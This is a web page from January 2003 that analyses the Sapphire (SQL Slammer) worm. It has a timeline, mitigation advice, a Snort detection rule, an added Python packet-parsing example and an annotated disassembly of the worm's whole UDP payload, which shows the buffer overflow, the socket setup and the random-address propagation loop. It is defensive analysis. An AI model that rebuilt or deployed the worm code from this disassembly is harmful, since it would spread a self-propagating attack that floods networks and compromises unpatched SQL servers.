
Another Annotated Disassembly of the Sapphire worm


The word is that a quick fix is to firewall port 1434/UDP traffic, and
reboot the affected SQL servers.

A suggested name for this outbreak is "Bill's Tapeworm".

Last updated 2003-1-25 19:22 CST

----------------------------------------------------
Starting at 11:30pm CST, Jan 24 2003, systems from all over the
internet began sending traffic (apparently) to random destinations. At
5:30am CST, traffic rates are dropping as backbone operators and ISPs
filter UDP traffic to port 1434 (MS-SQL Monitor).

At 6:30am CST, traffic at my site is down to a trickle (relatively
speaking), and CNN has heard about the worm:
    http://www.cnn.com/2003/TECH/internet/01/25/internet.attack.ap/index.html

If this is affecting your servers, this might be a good URL to check:
    http://support.microsoft.com/default.aspx?scid=kb;EN-US;290211
...or:
    http://www.postgresql.org/

...more info:
    http://www.eeye.com/html/Research/Flash/AL20030125.html
    http://www.securiteam.com/windowsntfocus/5TP0N1F7PS.html 
...and...
    http://www.kb.cert.org/vuls/id/370308

----------------------------------------------------
Suggested Snort rule to cover this worm (broken with \; nothing may follow
the backslash on a continued line):

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 \
(msg:"W32.SQLEXP.Worm propagation"; \
content:"|68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E|"; \
content:"|04|"; offset:0; depth:1; reference:cve,CAN-2002-0649; \
reference:cve,CAN-2002-0650; classtype:attempted-user; \
sid:20001; rev:1;)

----------------------------------------------------
A slashdot poster pointed out my error in including portions of the IP
and UDP headers in this dump; the actual data that gets delivered to a
listening socket begins at byte 0x1c (28 decimal) in the following
dump, and *is* 0x04, meaning that this is taking advantage of an old,
known vulnerability. Earlier versions of this file reflected my own
confusion on that point, and I apologize for spreading that
confusion.
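As an added example (not part of the original post), the following Python takes the first 0x1c bytes exactly as they appear in the dump below, shows where the UDP payload a listening socket receives actually begins, and applies the two content checks from the Snort rule above. The 376 payload bytes after the headers are a constructed stand-in, not the worm's bytes.

```python
import struct

# First 0x1c bytes of the dump on this page: 20-byte IPv4 header followed by
# the 8-byte UDP header (total length 0x0194 = 404, protocol 0x11 = UDP,
# destination port 0x059a = 1434, UDP length 0x0180 = 384).
HEADER = bytes.fromhex(
    "45 00 01 94 88 96 00 00 6e 11 b2 f0 0c 11 03 04 "
    "d1 ad 2f 10 07 f8 05 9a 01 80 1d 81"
)

# The 15 bytes the Snort rule's second content: option looks for (the three
# pushes that build "kernel32.dll" at offset 0xb3 of the dump).
SIGNATURE = bytes.fromhex("68 2e 64 6c 6c 68 65 6c 33 32 68 6b 65 72 6e")

# CONSTRUCTED stand-in for the 376-byte payload, not the worm's bytes: the
# 0x04 opcode, 0x01 filler, the signature at payload offset 0x97, NOP padding.
PAYLOAD = b"\x04" + b"\x01" * 0x96 + SIGNATURE
PAYLOAD += b"\x90" * (376 - len(PAYLOAD))
PACKET = HEADER + PAYLOAD


def parse_udp(packet):
    """Split a raw IPv4/UDP datagram into the header fields a listener never
    sees and the payload it actually receives."""
    if packet[0] >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (packet[0] & 0x0F) * 4                 # IP header length in bytes
    total_len = struct.unpack_from("!H", packet, 2)[0]
    if packet[9] != 17:
        raise ValueError("not UDP")
    sport, dport, udp_len = struct.unpack_from("!HHH", packet, ihl)
    payload_start = ihl + 8                      # 0x1c for a 20-byte IP header
    payload = packet[payload_start:ihl + udp_len]
    return {"total_len": total_len, "sport": sport, "dport": dport,
            "udp_len": udp_len, "payload_start": payload_start,
            "payload": payload}


def matches_rule(packet):
    """Apply the Snort rule's tests to one packet: UDP to port 1434, byte 0x04
    at payload offset 0 (offset:0; depth:1), and the signature anywhere."""
    fields = parse_udp(packet)
    payload = fields["payload"]
    return (fields["dport"] == 1434
            and payload[:1] == b"\x04"
            and SIGNATURE in payload)
```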

----------------------------------------------------
A better disassembly than what follows may be found at:
    http://www.boredom.org/~cstone/worm-annotated.txt

Actual overflow code begins at 0x91.
Disassembly of the 404 bytes (376 less headers) being sent by affected systems:
----------------------------------------------------

   0:	45                   	inc    %ebp
   1:	00 01                	add    %al,(%ecx)
   3:	94                   	xchg   %eax,%esp
   4:	88 96 00 00 6e 11    	mov    %dl,0x116e0000(%esi)
   a:	b2 f0                	mov    $0xf0,%dl
   c:	0c 11                	or     $0x11,%al
   e:	03 04 d1             	add    (%ecx,%edx,8),%eax
  11:	ad                   	lods   %ds:(%esi),%eax
  12:	2f                   	das    
  13:	10 07                	adc    %al,(%edi)
  15:	f8                   	clc    
  16:	05 9a 01 80 1d       	add    $0x1d80019a,%eax
  1b:	81 04 01 01 01 01 01 	addl   $0x1010101,(%ecx,%eax,1)
  22:	01 01                	add    %eax,(%ecx)
  24:	01 01                	add    %eax,(%ecx)
  26:	01 01                	add    %eax,(%ecx)
  28:	01 01                	add    %eax,(%ecx)
  2a:	01 01                	add    %eax,(%ecx)
  2c:	01 01                	add    %eax,(%ecx)
  2e:	01 01                	add    %eax,(%ecx)
  30:	01 01                	add    %eax,(%ecx)
  32:	01 01                	add    %eax,(%ecx)
  34:	01 01                	add    %eax,(%ecx)
  36:	01 01                	add    %eax,(%ecx)
  38:	01 01                	add    %eax,(%ecx)
  3a:	01 01                	add    %eax,(%ecx)
  3c:	01 01                	add    %eax,(%ecx)
  3e:	01 01                	add    %eax,(%ecx)
  40:	01 01                	add    %eax,(%ecx)
  42:	01 01                	add    %eax,(%ecx)
  44:	01 01                	add    %eax,(%ecx)
  46:	01 01                	add    %eax,(%ecx)
  48:	01 01                	add    %eax,(%ecx)
  4a:	01 01                	add    %eax,(%ecx)
  4c:	01 01                	add    %eax,(%ecx)
  4e:	01 01                	add    %eax,(%ecx)
  50:	01 01                	add    %eax,(%ecx)
  52:	01 01                	add    %eax,(%ecx)
  54:	01 01                	add    %eax,(%ecx)
  56:	01 01                	add    %eax,(%ecx)
  58:	01 01                	add    %eax,(%ecx)
  5a:	01 01                	add    %eax,(%ecx)
  5c:	01 01                	add    %eax,(%ecx)
  5e:	01 01                	add    %eax,(%ecx)
  60:	01 01                	add    %eax,(%ecx)
  62:	01 01                	add    %eax,(%ecx)
  64:	01 01                	add    %eax,(%ecx)
  66:	01 01                	add    %eax,(%ecx)
  68:	01 01                	add    %eax,(%ecx)
  6a:	01 01                	add    %eax,(%ecx)
  6c:	01 01                	add    %eax,(%ecx)
  6e:	01 01                	add    %eax,(%ecx)
  70:	01 01                	add    %eax,(%ecx)
  72:	01 01                	add    %eax,(%ecx)
  74:	01 01                	add    %eax,(%ecx)
  76:	01 01                	add    %eax,(%ecx)
  78:	01 01                	add    %eax,(%ecx)
  7a:	01 01                	add    %eax,(%ecx)
  7c:	01 dc                	add    %ebx,%esp
  7e:	c9                   	leave  
  7f:	b0 42                	mov    $0x42,%al
  81:	eb 0e                	jmp    0x91
  83:	01 01                	add    %eax,(%ecx)
  85:	01 01                	add    %eax,(%ecx)
  87:	01 01                	add    %eax,(%ecx)
  89:	01 70 ae             	add    %esi,0xffffffae(%eax)
  8c:	42                   	inc    %edx
  8d:	01 70 ae             	add    %esi,0xffffffae(%eax)
  90:	42                   	inc    %edx
  91:	90                   	nop    
  92:	90                   	nop    
  93:	90                   	nop    
  94:	90                   	nop    
  95:	90                   	nop    
  96:	90                   	nop    
  97:	90                   	nop    
  98:	90                   	nop    
  99:	68 dc c9 b0 42       	push   $0x42b0c9dc
  9e:	b8 01 01 01 01       	mov    $0x1010101,%eax
  a3:	31 c9                	xor    %ecx,%ecx
  a5:	b1 18                	mov    $0x18,%cl
  a7:	50                   	push   %eax
  a8:	e2 fd                	loop   0xa7
  aa:	35 01 01 01 05       	xor    $0x5010101,%eax
  af:	50                   	push   %eax
  b0:	89 e5                	mov    %esp,%ebp
  b2:	51                   	push   %ecx
  b3:	68 2e 64 6c 6c       	push   $0x6c6c642e
  b8:	68 65 6c 33 32       	push   $0x32336c65
  bd:	68 6b 65 72 6e       	push   $0x6e72656b
  c2:	51                   	push   %ecx
  c3:	68 6f 75 6e 74       	push   $0x746e756f
  c8:	68 69 63 6b 43       	push   $0x436b6369
  cd:	68 47 65 74 54       	push   $0x54746547
  d2:	66 b9 6c 6c          	mov    $0x6c6c,%cx
  d6:	51                   	push   %ecx
  d7:	68 33 32 2e 64       	push   $0x642e3233
  dc:	68 77 73 32 5f       	push   $0x5f327377
  e1:	66 b9 65 74          	mov    $0x7465,%cx
  e5:	51                   	push   %ecx
  e6:	68 73 6f 63 6b       	push   $0x6b636f73
  eb:	66 b9 74 6f          	mov    $0x6f74,%cx
  ef:	51                   	push   %ecx
  f0:	68 73 65 6e 64       	push   $0x646e6573
  f5:	be 18 10 ae 42       	mov    $0x42ae1018,%esi
  fa:	8d 45 d4             	lea    0xffffffd4(%ebp),%eax
  fd:	50                   	push   %eax
  fe:	ff 16                	call   *(%esi)
 100:	50                   	push   %eax
 101:	8d 45 e0             	lea    0xffffffe0(%ebp),%eax
 104:	50                   	push   %eax
 105:	8d 45 f0             	lea    0xfffffff0(%ebp),%eax
 108:	50                   	push   %eax
 109:	ff 16                	call   *(%esi)
 10b:	50                   	push   %eax
 10c:	be 10 10 ae 42       	mov    $0x42ae1010,%esi
 111:	8b 1e                	mov    (%esi),%ebx
 113:	8b 03                	mov    (%ebx),%eax
 115:	3d 55 8b ec 51       	cmp    $0x51ec8b55,%eax
 11a:	74 05                	je     0x121
 11c:	be 1c 10 ae 42       	mov    $0x42ae101c,%esi
 121:	ff 16                	call   *(%esi)
 123:	ff d0                	call   *%eax
 125:	31 c9                	xor    %ecx,%ecx
 127:	51                   	push   %ecx
 128:	51                   	push   %ecx
 129:	50                   	push   %eax
 12a:	81 f1 03 01 04 9b    	xor    $0x9b040103,%ecx
 130:	81 f1 01 01 01 01    	xor    $0x1010101,%ecx
 136:	51                   	push   %ecx
 137:	8d 45 cc             	lea    0xffffffcc(%ebp),%eax
 13a:	50                   	push   %eax
 13b:	8b 45 c0             	mov    0xffffffc0(%ebp),%eax
 13e:	50                   	push   %eax
 13f:	ff 16                	call   *(%esi)
 141:	6a 11                	push   $0x11
 143:	6a 02                	push   $0x2
 145:	6a 02                	push   $0x2
 147:	ff d0                	call   *%eax
 149:	50                   	push   %eax
 14a:	8d 45 c4             	lea    0xffffffc4(%ebp),%eax
 14d:	50                   	push   %eax
 14e:	8b 45 c0             	mov    0xffffffc0(%ebp),%eax
 151:	50                   	push   %eax
 152:	ff 16                	call   *(%esi)
 154:	89 c6                	mov    %eax,%esi
 156:	09 db                	or     %ebx,%ebx
 158:	81 f3 3c 61 d9 ff    	xor    $0xffd9613c,%ebx
 15e:	8b 45 b4             	mov    0xffffffb4(%ebp),%eax
 161:	8d 0c 40             	lea    (%eax,%eax,2),%ecx
 164:	8d 14 88             	lea    (%eax,%ecx,4),%edx
 167:	c1 e2 04             	shl    $0x4,%edx
 16a:	01 c2                	add    %eax,%edx
 16c:	c1 e2 08             	shl    $0x8,%edx
 16f:	29 c2                	sub    %eax,%edx
 171:	8d 04 90             	lea    (%eax,%edx,4),%eax
 174:	01 d8                	add    %ebx,%eax
 176:	89 45 b4             	mov    %eax,0xffffffb4(%ebp)
 179:	6a 10                	push   $0x10
 17b:	8d 45 b0             	lea    0xffffffb0(%ebp),%eax
 17e:	50                   	push   %eax
 17f:	31 c9                	xor    %ecx,%ecx
 181:	51                   	push   %ecx
 182:	66 81 f1 78 01       	xor    $0x178,%cx
 187:	51                   	push   %ecx
 188:	8d 45 03             	lea    0x3(%ebp),%eax
 18b:	50                   	push   %eax
 18c:	8b 45 ac             	mov    0xffffffac(%ebp),%eax
 18f:	50                   	push   %eax
 190:	ff d6                	call   *%esi
 192:	eb ca                	jmp    0x15e
